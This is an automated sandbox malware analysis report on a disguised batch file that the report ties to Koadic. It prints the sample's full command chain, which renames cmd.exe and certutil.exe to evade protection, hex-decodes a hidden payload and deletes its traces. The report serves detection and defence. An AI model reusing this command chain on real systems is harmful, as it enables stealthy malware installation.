Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1x40 CONTAINER.PDF-.bat

Overview

General Information

Sample name:1x40 CONTAINER.PDF-.bat
Analysis ID:1569543
MD5:91f00c06e8cc61fe9239eefdb0dd0c03
SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7332 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7356 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7372 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7400 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7416 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7444 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7460 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7480 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7512 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1x40 CONTAINER.PDF-.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~57,1%%
  • 0x64:$s2: :~50,1%%
  • 0x6f:$s2: :~44,1%%
  • 0x7a:$s2: :~39,1%%
  • 0x85:$s2: :~4,1%
  • 0x96:$s2: :~46,1%%
  • 0xa1:$s2: :~15,1%%
  • 0xac:$s2: :~49,1%%
  • 0xb7:$s2: :~0,1%%
  • 0xc1:$s2: :~37,1%%
  • 0xcc:$s2: :~42,1%%
  • 0xd7:$s2: :~23,1%%
  • 0xe2:$s2: :~40,1%%
  • 0xed:$s2: :~19,1%%
  • 0xf8:$s2: :~60,1%%
  • 0x103:$s2: :~4,1%%
  • 0x10d:$s2: :~47,1%%
  • 0x118:$s2: :~56,1%%
  • 0x123:$s2: :~35,1%%
  • 0x12e:$s2: :~39,1%%

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7276, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7356, ProcessName: alpha.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7356, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7372, ProcessName: extrac32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1x40 CONTAINER.PDF-.batReversingLabs: Detection: 27%
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5462F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6C5462F38
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5462C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,6_2_00007FF6C5462C2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,6_2_00007FF6C54C4694
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5486694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,6_2_00007FF6C5486694
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,6_2_00007FF6C54BA654
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526654 NCryptGetProperty,#360,6_2_00007FF6C5526654
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E2724 CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54E2724
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55266D8 NCryptFreeObject,#360,6_2_00007FF6C55266D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55186D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,6_2_00007FF6C55186D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54926E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,6_2_00007FF6C54926E0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,6_2_00007FF6C54EE57C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F65B4 NCryptIsKeyHandle,_CxxThrowException,6_2_00007FF6C54F65B4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,6_2_00007FF6C555A58C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6C552A590
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5478600 #357,CryptDecodeObject,GetLastError,LocalFree,6_2_00007FF6C5478600
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5480630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5480630
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF6C547C5D4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF6C54B25E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,6_2_00007FF6C555E8B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0844 BCryptExportKey,#205,#359,#357,#357,6_2_00007FF6C54F0844
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,6_2_00007FF6C54DE914
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5524914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C5524914
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C546A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,6_2_00007FF6C546A8CC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F08EC BCryptGetProperty,#205,#359,#357,#357,6_2_00007FF6C54F08EC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F07A4 BCryptDestroyHash,#205,#357,6_2_00007FF6C54F07A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0740 BCryptCloseAlgorithmProvider,#205,#357,#357,6_2_00007FF6C54F0740
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C552A740
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5476824 CryptHashCertificate,GetLastError,#357,6_2_00007FF6C5476824
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5528814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,6_2_00007FF6C5528814
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54567CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54567CC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55007D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C55007D0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54E27BC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F07F4 BCryptDestroyKey,#205,#357,6_2_00007FF6C54F07F4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6C54DC7F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5528298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,6_2_00007FF6C5528298
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54C6280
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5512278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6C5512278
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C551E274
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5490300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,6_2_00007FF6C5490300
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,6_2_00007FF6C555A2E0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6C54D6194
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55161AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,6_2_00007FF6C55161AC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6C54B417C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54921A4 #360,#359,#357,#357,BCryptFreeBuffer,6_2_00007FF6C54921A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555613C CryptDecodeObjectEx,6_2_00007FF6C555613C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6C54EE1F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,6_2_00007FF6C552A1F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5556214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,6_2_00007FF6C5556214
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,6_2_00007FF6C54DA1E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54E8488
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54CA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,6_2_00007FF6C54CA450
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54CC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,6_2_00007FF6C54CC450
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C551E516
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,6_2_00007FF6C547C514
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,6_2_00007FF6C54C24D4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54644E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54644E0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547E3B0 #357,#357,CryptDecodeObject,LocalFree,6_2_00007FF6C547E3B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,6_2_00007FF6C54E6374
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,6_2_00007FF6C54E2358
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5474410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5474410
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5528404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6C5528404
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54923E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,6_2_00007FF6C54923E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5490E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF6C5490E94
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526EA8 NCryptImportKey,#360,6_2_00007FF6C5526EA8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6C54C2E7C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551EE94 CryptSignMessage,SetLastError,6_2_00007FF6C551EE94
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5534E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF6C5534E58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF6C54F2E6C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526E48 NCryptSetProperty,#360,6_2_00007FF6C5526E48
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526F2C NCryptExportKey,#360,6_2_00007FF6C5526F2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5488F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF6C5488F1C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF6C54F0EF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5550ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF6C5550ED0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0D84 NCryptFreeObject,#205,#357,6_2_00007FF6C54F0D84
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5522DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF6C5522DAC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F2D78
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526D78 NCryptOpenKey,#360,6_2_00007FF6C5526D78
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5480E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5480E24
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF6C54F0DD4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526DE0 NCryptCreatePersistedKey,#360,6_2_00007FF6C5526DE0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5540DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF6C5540DB8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C54D4DDC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5518DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF6C5518DD0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C549107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF6C549107C
